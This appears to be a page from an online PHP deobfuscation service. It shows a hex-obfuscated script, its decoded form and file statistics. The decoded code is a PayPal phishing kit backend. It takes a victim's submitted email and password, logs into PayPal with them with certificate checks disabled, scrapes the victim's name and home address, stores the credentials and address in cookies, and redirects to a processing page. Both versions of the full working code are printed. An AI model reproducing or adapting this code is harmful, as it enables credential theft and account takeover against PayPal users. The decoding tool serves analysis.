Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php ini_set("\x6d\x61\x78_\x65\x78\x65c\x75\x74\x69\x6fn\x5f\x74\x69m\x65","\x36\x30\x3..

Decoded Output download

<?php 
ini_set("max_execution_time","600"); 
 function mystr1s155 
($mystr1s3235,$mystr1s3236){$mystr1s3237 = tempnam("./tmp", "CURLCOOKIE"); 
$mystr1s3238 = curl_init("https://www.paypal.fr/fr"); 
curl_setopt($mystr1s3238, CURLOPT_COOKIEJAR, $mystr1s3237);curl_setopt($mystr1s3238, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($mystr1s3238 , CURLOPT_SSL_VERIFYPEER , false );curl_setopt($mystr1s3238 , CURLOPT_SSL_VERIFYHOST , false ); 
curl_setopt($mystr1s3238, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);curl_setopt($mystr1s3238, CURLOPT_FRESH_CONNECT, true); 
$mystr1s3239 = curl_exec($mystr1s3238);if(preg_match('/name="login_form" action="(.*?)">/', $mystr1s3239, $mystr1s3240)) 
{$mystr1s3241 = $mystr1s3240[1];} 
else 
$mystr1s3241 = "https://www.paypal.com/fr/cgi-bin/webscr?cmd=_login-run&amp;dispatch=5885d80a13c0db1f8e263663d3faee8deaa77efc63a6eb429928d42bdf5d9d2c"; 
$mystr1s3242 = tempnam("./tmp", "CURLCOOKIE");$mystr1s3238 = curl_init($mystr1s3241); 
curl_setopt($mystr1s3238, CURLOPT_COOKIEFILE, $mystr1s3237);curl_setopt($mystr1s3238, CURLOPT_COOKIEJAR, $mystr1s3242); 
curl_setopt($mystr1s3238, CURLOPT_RETURNTRANSFER, 1);curl_setopt($mystr1s3238 , CURLOPT_SSL_VERIFYPEER , false ); 
curl_setopt($mystr1s3238 , CURLOPT_SSL_VERIFYHOST , false );curl_setopt($mystr1s3238, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); 
curl_setopt($mystr1s3238, CURLOPT_FRESH_CONNECT, true);$mystr1s3243 = curl_exec($mystr1s3238);$mystr1s3244 = substr($mystr1s3241,strpos($mystr1s3241, "h=") + 2); 
$mystr1s3245 = "https://www.paypal.com/fr/cgi-bin/webscr?cmd=_login-submit&amp;dispatch=".$mystr1s3244; 
$mystr1s3246 = tempnam("./tmp", "CURLCOOKIE");$mystr1s3238 = curl_init($mystr1s3245); 
$mystr1s3247 ="login_cmd=&login_params=&login_email=".urlencode($mystr1s3235)."&login_password=".urlencode($mystr1s3236)."&target_page=0&submit.x=Connectez-vous&form_charset=UTF-8&browser_name=Firefox&browser_version=5&operating_system=Windows&flow_name=p%2Fgen%2Flogin&bp_mid=v%3D1%3Ba1%3Dna%7Ea2%3Dna%7Ea3%3Dna%7Ea4%3DMozilla%7Ea5%3DNetscape%7Ea6%3D5.0+%28Windows%29%7Ea7%3D20100101%7Ea8%3Dna%7Ea9%3Dtrue%7Ea10%3DWindows+NT+6.1%7Ea11%3Dtrue%7Ea12%3DWin32%7Ea13%3Dna%7Ea14%3DMozilla%2F5.0+%28Windows+NT+6.1%3B+rv%3A5.0%29+Gecko%2F20100101+Firefox%2F5.0%7Ea15%3Dfalse%7Ea16%3Dfr%7Ea17%3Dna%7Ea18%3Dwww.paypal.com%7Ea19%3Dna%7Ea20%3Dna%7Ea21%3Dna%7Ea22%3Dna%7Ea23%3D1280%7Ea24%3D800%7Ea25%3D24%7Ea26%3D760%7Ea27%3Dna%7Ea28%3DTue+Jul+12+2011+02%3A59%3A08+GMT%2B0100%7Ea29%3D1%7Ea30%3Dswf%7Cdsw%7Cpdf%7C%7Ea31%3Dyes%7Ea32%3Dna%7Ea33%3Dna%7Ea34%3Dno%7Ea35%3Dno%7Ea36%3Dyes%7Ea37%3Dno%7Ea38%3Donline%7Ea39%3Dno%7Ea40%3DWindows+NT+6.1%7Ea41%3Dno%7Ea42%3Dno%7E&bp_ks1=v%3D1%3Bl%3D6%3BDi0%3A294535Ui0%3A60Di1%3A263Ui1%3A70Di2%3A571Ui2%3A101Di3%3A453Ui3%3A61Di4%3A80Ui4%3A70Di5%3A220Ui5%3A61&bp_ks2=&bp_ks3=&flow_name=p%2Fgen%2Flogin&fso_enabled=10"; 
curl_setopt($mystr1s3238, CURLOPT_COOKIEFILE, $mystr1s3242);curl_setopt($mystr1s3238, CURLOPT_COOKIEJAR, $mystr1s3246); 
curl_setopt($mystr1s3238, CURLOPT_RETURNTRANSFER, 1);curl_setopt($mystr1s3238, CURLOPT_FOLLOWLOCATION, TRUE); 
curl_setopt($mystr1s3238, CURLOPT_POST, TRUE);curl_setopt($mystr1s3238, CURLOPT_POSTFIELDS, $mystr1s3247); 
curl_setopt($mystr1s3238 , CURLOPT_SSL_VERIFYPEER , false );curl_setopt($mystr1s3238 , CURLOPT_SSL_VERIFYHOST , false ); 
curl_setopt($mystr1s3238, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);curl_setopt($mystr1s3238, CURLOPT_FRESH_CONNECT, true); 
$mystr1s3248 = curl_exec($mystr1s3238);$mystr1s3249 = false;if(strpos($mystr1s3248,"Ouvrir un compte") > 0) 
{$mystr1s3249 = false;} 
else 
{$mystr1s3249 = true;}if($mystr1s3249){$mystr1s3238 = curl_init("https://www.paypal.com/fr/cgi-bin/webscr?cmd=_profile-address&nav=0.5.3"); 
curl_setopt($mystr1s3238, CURLOPT_COOKIEFILE, $mystr1s3246);curl_setopt($mystr1s3238, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($mystr1s3238 , CURLOPT_SSL_VERIFYPEER , false );curl_setopt($mystr1s3238 , CURLOPT_SSL_VERIFYHOST , false ); 
curl_setopt($mystr1s3238, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);curl_setopt($mystr1s3238, CURLOPT_FRESH_CONNECT, true); 
$mystr1s3250 = curl_exec($mystr1s3238);if(preg_match('/(<span class="emphasis">)(.*)(<\/span><input)/', $mystr1s3250, $mystr1s3240)) 
{$mystr1s3251 = explode("<br>",$mystr1s3240[2]);$mystr1s3252 = explode(" ", $mystr1s3251[0]); 
$mystr1s3253 = explode("&nbsp;", $mystr1s3251[2]);$mystr1s3254 = $mystr1s3252[0];$mystr1s3255 = $mystr1s3252[1]; 
$mystr1s3256 = $mystr1s3251[1];$mystr1s3257 = $mystr1s3253[0];$mystr1s3258 = $mystr1s3253[1];setcookie("prenom", $mystr1s3254, time()+3600); 
setcookie("nom", $mystr1s3255, time()+3600);setcookie("homeAddress", $mystr1s3256, time()+3600); 
setcookie("zip", $mystr1s3257, time()+3600);setcookie("city", $mystr1s3258, time()+3600); 
}}curl_close($mystr1s3238);unlink($mystr1s3237);unlink($mystr1s3242);unlink($mystr1s3246);return $mystr1s3249; 
} 
if(isset($_POST['login_email'])){$mystr1s4235 = mystr1s155($_POST["login_email"],$_POST["login_password"]); 
if($mystr1s4235){setcookie("login_email", $_POST["login_email"], time()+3600); 
setcookie("login_password", $_POST["login_password"], time()+3600); 
header("Location: Processing.php?www.paypal.com/au/cgi-bin/webscr?cmd=_account=0"); 
} 
else 
header("Location: erorr.html?www.paypal.com/cgi-bin/webscr?cmd=_account=0"); 
} 
?>

Did this file decode correctly?

Original Code

<?php
ini_set("\x6d\x61\x78_\x65\x78\x65c\x75\x74\x69\x6fn\x5f\x74\x69m\x65","\x36\x30\x30");
 function mystr1s155
($mystr1s3235,$mystr1s3236){$mystr1s3237 = tempnam("\x2e\x2f\x74m\x70", "\x43\x55\x52L\x43\x4f\x4fK\x49\x45");
$mystr1s3238 = curl_init("\x68\x74\x74p\x73\x3a\x2f/\x77\x77\x77\x2ep\x61\x79\x70a\x6c\x2e\x66r\x2f\x66r");
curl_setopt($mystr1s3238, CURLOPT_COOKIEJAR, $mystr1s3237);curl_setopt($mystr1s3238, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($mystr1s3238 , CURLOPT_SSL_VERIFYPEER , false );curl_setopt($mystr1s3238 , CURLOPT_SSL_VERIFYHOST , false );
curl_setopt($mystr1s3238, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);curl_setopt($mystr1s3238, CURLOPT_FRESH_CONNECT, true);
$mystr1s3239 = curl_exec($mystr1s3238);if(preg_match('/name="login_form" action="(.*?)">/', $mystr1s3239, $mystr1s3240))
{$mystr1s3241 = $mystr1s3240[1];}
else
$mystr1s3241 = "\x68\x74\x74p\x73\x3a\x2f/\x77\x77\x77\x2ep\x61\x79\x70a\x6c\x2e\x63o\x6d\x2ff\x72\x2f\x63\x67\x69-\x62i\x6e/\x77e\x62s\x63\x72?\x63m\x64=\x5f\x6c\x6f\x67i\x6e-\x72u\x6e&\x61\x6d\x70\x3b\x64\x69s\x70a\x74\x63\x68\x3d\x358\x385\x64\x380\x611\x33\x63\x30\x64\x62\x31f\x38e\x32\x363\x36\x363\x643\x66a\x65\x658\x64e\x61a\x377\x65f\x63\x363\x61\x36e\x624\x32\x399\x32\x38d\x342\x62\x64\x665\x64\x39\x642\x63";
$mystr1s3242 = tempnam("\x2e\x2f\x74m\x70", "\x43\x55\x52L\x43\x4f\x4fK\x49\x45");$mystr1s3238 = curl_init($mystr1s3241);
curl_setopt($mystr1s3238, CURLOPT_COOKIEFILE, $mystr1s3237);curl_setopt($mystr1s3238, CURLOPT_COOKIEJAR, $mystr1s3242);
curl_setopt($mystr1s3238, CURLOPT_RETURNTRANSFER, 1);curl_setopt($mystr1s3238 , CURLOPT_SSL_VERIFYPEER , false );
curl_setopt($mystr1s3238 , CURLOPT_SSL_VERIFYHOST , false );curl_setopt($mystr1s3238, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($mystr1s3238, CURLOPT_FRESH_CONNECT, true);$mystr1s3243 = curl_exec($mystr1s3238);$mystr1s3244 = substr($mystr1s3241,strpos($mystr1s3241, "\x68\x3d") + 2);
$mystr1s3245 = "\x68\x74\x74p\x73\x3a\x2f/\x77\x77\x77\x2ep\x61\x79\x70a\x6c\x2e\x63o\x6d\x2ff\x72\x2f\x63\x67\x69-\x62i\x6e/\x77e\x62s\x63\x72?\x63m\x64=\x5f\x6c\x6f\x67i\x6e-\x73u\x62m\x69\x74\x26\x61\x6d\x70;\x64i\x73\x70\x61\x74\x63h\x3d".$mystr1s3244;
$mystr1s3246 = tempnam("\x2e\x2f\x74m\x70", "\x43\x55\x52L\x43\x4f\x4fK\x49\x45");$mystr1s3238 = curl_init($mystr1s3245);
$mystr1s3247 ="\x6c\x6f\x67i\x6e\x5f\x63m\x64\x3d\x26\x6co\x67\x69\x6e_\x70\x61\x72a\x6d\x73=\x26\x6c\x6f\x67\x69n\x5fe\x6da\x69l\x3d".urlencode($mystr1s3235)."\x26\x6c\x6fg\x69\x6e\x5fp\x61\x73\x73\x77o\x72\x64\x3d".urlencode($mystr1s3236)."\x26\x74\x61r\x67\x65\x74_\x70\x61\x67\x65=\x30\x26\x73u\x62\x6d\x69t\x2e\x78=\x43\x6f\x6e\x6e\x65c\x74e\x7a-\x76o\x75s\x26\x66o\x72m\x5fc\x68\x61\x72\x73e\x74=\x55T\x46-\x38\x26\x62\x72\x6f\x77s\x65r\x5f\x6e\x61\x6d\x65=\x46i\x72\x65f\x6fx\x26\x62\x72\x6f\x77\x73e\x72_\x76\x65r\x73\x69o\x6e=\x35&\x6f\x70e\x72a\x74i\x6eg\x5fs\x79\x73t\x65\x6d=\x57i\x6e\x64o\x77\x73&\x66l\x6f\x77\x5fn\x61\x6d\x65=\x70%\x32\x46g\x65\x6e\x25\x32F\x6co\x67\x69\x6e&\x62\x70\x5fm\x69d\x3dv\x25\x33\x441\x253\x42\x61\x31%\x33D\x6ea\x25\x37\x45a\x32\x253\x44n\x61%\x37E\x61\x33%\x33\x44\x6e\x61\x257\x45a\x34\x25\x33D\x4do\x7ai\x6cl\x61%\x37E\x61\x35\x25\x33\x44N\x65t\x73c\x61p\x65%\x37E\x616\x253\x44\x35\x2e0\x2b\x252\x38W\x69\x6e\x64o\x77\x73%\x32\x39%\x37E\x61\x37%\x33\x44\x320\x310\x301\x30\x31\x257\x45\x61\x38%\x33D\x6e\x61%\x37\x45\x61\x39\x253\x44\x74r\x75\x65%\x37\x45a\x310\x25\x33D\x57\x69\x6e\x64o\x77s\x2bN\x54+\x36.\x31\x25\x37\x45\x61\x31\x31%\x33D\x74r\x75\x65%\x37E\x611\x32%\x33D\x57i\x6e\x332\x25\x37E\x61\x313\x253\x44n\x61%\x37\x45\x61\x314\x25\x33\x44M\x6f\x7ai\x6c\x6ca\x252\x465\x2e0\x2b%\x32\x38\x57i\x6e\x64o\x77\x73\x2bN\x54\x2b\x36.\x31%\x33B\x2br\x76%\x33A\x35\x2e0\x25\x329\x2bG\x65c\x6bo\x252\x46\x32\x301\x30\x30\x31\x30\x31+\x46i\x72\x65\x66o\x78%\x32\x465\x2e\x30\x257\x45a\x315\x253\x44f\x61l\x73\x65%\x37E\x61\x31\x36\x253\x44f\x72%\x37E\x61\x31\x37%\x33D\x6ea\x25\x37\x45\x611\x38%\x33\x44\x77w\x77.\x70\x61y\x70a\x6c.\x63\x6fm\x25\x37E\x611\x39\x25\x33D\x6ea\x257\x45\x612\x30%\x33D\x6ea\x25\x37E\x61\x32\x31%\x33D\x6e\x61%\x37\x45a\x322\x253\x44\x6e\x61%\x37\x45\x61\x32\x33\x253\x441\x32\x380\x25\x37E\x61\x32\x34%\x33D\x38\x300\x257\x45a\x32\x35%\x33D\x32\x34\x25\x37E\x61\x326\x25\x33D\x376\x30%\x37\x45\x61\x327\x25\x33D\x6e\x61%\x37E\x612\x38%\x33\x44T\x75e\x2b\x4a\x75\x6c\x2b\x312\x2b\x320\x31\x31+\x30\x32\x253\x415\x39%\x33A\x308\x2bG\x4d\x54%\x32B\x30\x310\x30\x25\x37E\x612\x39%\x33D\x31%\x37\x45\x61\x330\x253\x44s\x77\x66%\x37C\x64\x73\x77\x257\x43p\x64f\x25\x37\x43%\x37E\x613\x31\x253\x44y\x65\x73%\x37E\x613\x32\x25\x33\x44\x6ea\x25\x37\x45\x613\x33%\x33\x44n\x61%\x37E\x613\x34\x25\x33\x44\x6e\x6f%\x37\x45\x613\x35\x253\x44n\x6f%\x37E\x61\x33\x36%\x33D\x79\x65s\x257\x45\x61\x337\x25\x33\x44\x6eo\x25\x37\x45a\x33\x38%\x33\x44o\x6el\x69n\x65%\x37E\x613\x39%\x33\x44n\x6f%\x37E\x61\x340\x253\x44W\x69n\x64\x6fw\x73+\x4eT\x2b6\x2e1\x25\x37\x45a\x341\x253\x44\x6eo\x257\x45\x614\x32\x25\x33\x44n\x6f\x25\x37\x45&\x62p\x5fk\x731\x3d\x76\x25\x33\x441\x25\x33\x42l\x25\x33D\x36%\x33B\x44i\x30%\x33\x412\x394\x353\x35U\x69\x30%\x33A\x360\x44\x691\x253\x412\x363\x55i\x31\x253\x41\x37\x30D\x692\x25\x33A\x35\x37\x31\x55i\x32%\x33\x41\x31\x301\x44\x693\x253\x414\x353\x55i\x33\x253\x41\x361\x44i\x34%\x33A\x380\x55\x694\x253\x417\x30D\x695\x25\x33A\x322\x30\x55i\x35\x253\x41\x36\x31&\x62\x70\x5fk\x73\x32\x3d&\x62p\x5f\x6bs\x33=\x26f\x6co\x77_\x6e\x61m\x65=\x70%\x32\x46g\x65\x6e\x25\x32F\x6c\x6f\x67i\x6e\x26\x66s\x6f\x5f\x65n\x61\x62\x6c\x65\x64=\x31\x30";
curl_setopt($mystr1s3238, CURLOPT_COOKIEFILE, $mystr1s3242);curl_setopt($mystr1s3238, CURLOPT_COOKIEJAR, $mystr1s3246);
curl_setopt($mystr1s3238, CURLOPT_RETURNTRANSFER, 1);curl_setopt($mystr1s3238, CURLOPT_FOLLOWLOCATION, TRUE);
curl_setopt($mystr1s3238, CURLOPT_POST, TRUE);curl_setopt($mystr1s3238, CURLOPT_POSTFIELDS, $mystr1s3247);
curl_setopt($mystr1s3238 , CURLOPT_SSL_VERIFYPEER , false );curl_setopt($mystr1s3238 , CURLOPT_SSL_VERIFYHOST , false );
curl_setopt($mystr1s3238, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);curl_setopt($mystr1s3238, CURLOPT_FRESH_CONNECT, true);
$mystr1s3248 = curl_exec($mystr1s3238);$mystr1s3249 = false;if(strpos($mystr1s3248,"\x4f\x75\x76r\x69\x72\x20u\x6e\x20\x63\x6fm\x70\x74\x65") > 0)
{$mystr1s3249 = false;}
else
{$mystr1s3249 = true;}if($mystr1s3249){$mystr1s3238 = curl_init("\x68\x74\x74p\x73\x3a\x2f/\x77\x77\x77\x2ep\x61\x79\x70a\x6c\x2e\x63o\x6d\x2ff\x72\x2f\x63\x67\x69-\x62i\x6e/\x77e\x62s\x63\x72?\x63m\x64=\x5f\x70\x72\x6ff\x69l\x65-\x61d\x64\x72\x65\x73\x73\x26n\x61v\x3d\x30\x2e\x35\x2e3");
curl_setopt($mystr1s3238, CURLOPT_COOKIEFILE, $mystr1s3246);curl_setopt($mystr1s3238, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($mystr1s3238 , CURLOPT_SSL_VERIFYPEER , false );curl_setopt($mystr1s3238 , CURLOPT_SSL_VERIFYHOST , false );
curl_setopt($mystr1s3238, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);curl_setopt($mystr1s3238, CURLOPT_FRESH_CONNECT, true);
$mystr1s3250 = curl_exec($mystr1s3238);if(preg_match('/(<span class="emphasis">)(.*)(<\/span><input)/', $mystr1s3250, $mystr1s3240))
{$mystr1s3251 = explode("\x3c\x62\x72>",$mystr1s3240[2]);$mystr1s3252 = explode("\x20", $mystr1s3251[0]);
$mystr1s3253 = explode("\x26\x6e\x62s\x70\x3b", $mystr1s3251[2]);$mystr1s3254 = $mystr1s3252[0];$mystr1s3255 = $mystr1s3252[1];
$mystr1s3256 = $mystr1s3251[1];$mystr1s3257 = $mystr1s3253[0];$mystr1s3258 = $mystr1s3253[1];setcookie("\x70\x72\x65n\x6f\x6d", $mystr1s3254, time()+3600);
setcookie("\x6e\x6f\x6d", $mystr1s3255, time()+3600);setcookie("\x68\x6f\x6de\x41\x64\x64r\x65\x73\x73", $mystr1s3256, time()+3600);
setcookie("\x7a\x69\x70", $mystr1s3257, time()+3600);setcookie("\x63\x69\x74y", $mystr1s3258, time()+3600);
}}curl_close($mystr1s3238);unlink($mystr1s3237);unlink($mystr1s3242);unlink($mystr1s3246);return $mystr1s3249;
}
if(isset($_POST['login_email'])){$mystr1s4235 = mystr1s155($_POST["\x6c\x6f\x67i\x6e\x5f\x65m\x61\x69\x6c"],$_POST["\x6c\x6f\x67i\x6e\x5f\x70a\x73\x73\x77\x6fr\x64"]);
if($mystr1s4235){setcookie("\x6c\x6f\x67i\x6e\x5f\x65m\x61\x69\x6c", $_POST["\x6c\x6f\x67i\x6e\x5f\x65m\x61\x69\x6c"], time()+3600);
setcookie("\x6c\x6f\x67i\x6e\x5f\x70a\x73\x73\x77\x6fr\x64", $_POST["\x6c\x6f\x67i\x6e\x5f\x70a\x73\x73\x77\x6fr\x64"], time()+3600);
header("\x4c\x6f\x63a\x74\x69\x6fn\x3a\x20\x50\x72o\x63\x65\x73s\x69\x6e\x67.\x70\x68p\x3f\x77\x77\x77\x2ep\x61y\x70a\x6c.\x63o\x6d\x2fa\x75/\x63g\x69-\x62\x69n\x2fw\x65b\x73c\x72\x3f\x63\x6d\x64\x3d_\x61c\x63\x6f\x75\x6e\x74=\x30");
}
else
header("\x4c\x6f\x63a\x74\x69\x6fn\x3a\x20\x65\x72o\x72\x72\x2eh\x74\x6d\x6c?\x77\x77w\x2e\x70\x61\x79\x70a\x6c.\x63o\x6d/\x63g\x69-b\x69n\x2fw\x65\x62\x73\x63r\x3fc\x6dd\x3d_\x61\x63\x63\x6f\x75\x6et\x3d0");
}
?>

Function Calls

ini_set	1
tempnam	1
mystr1s155	1

Variables

$mystr1s3235	None
$mystr1s3236	None

Stats

MD5	5785f62765cab7116defda5fa3eda57a
Eval Count	0
Decode Time	119 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats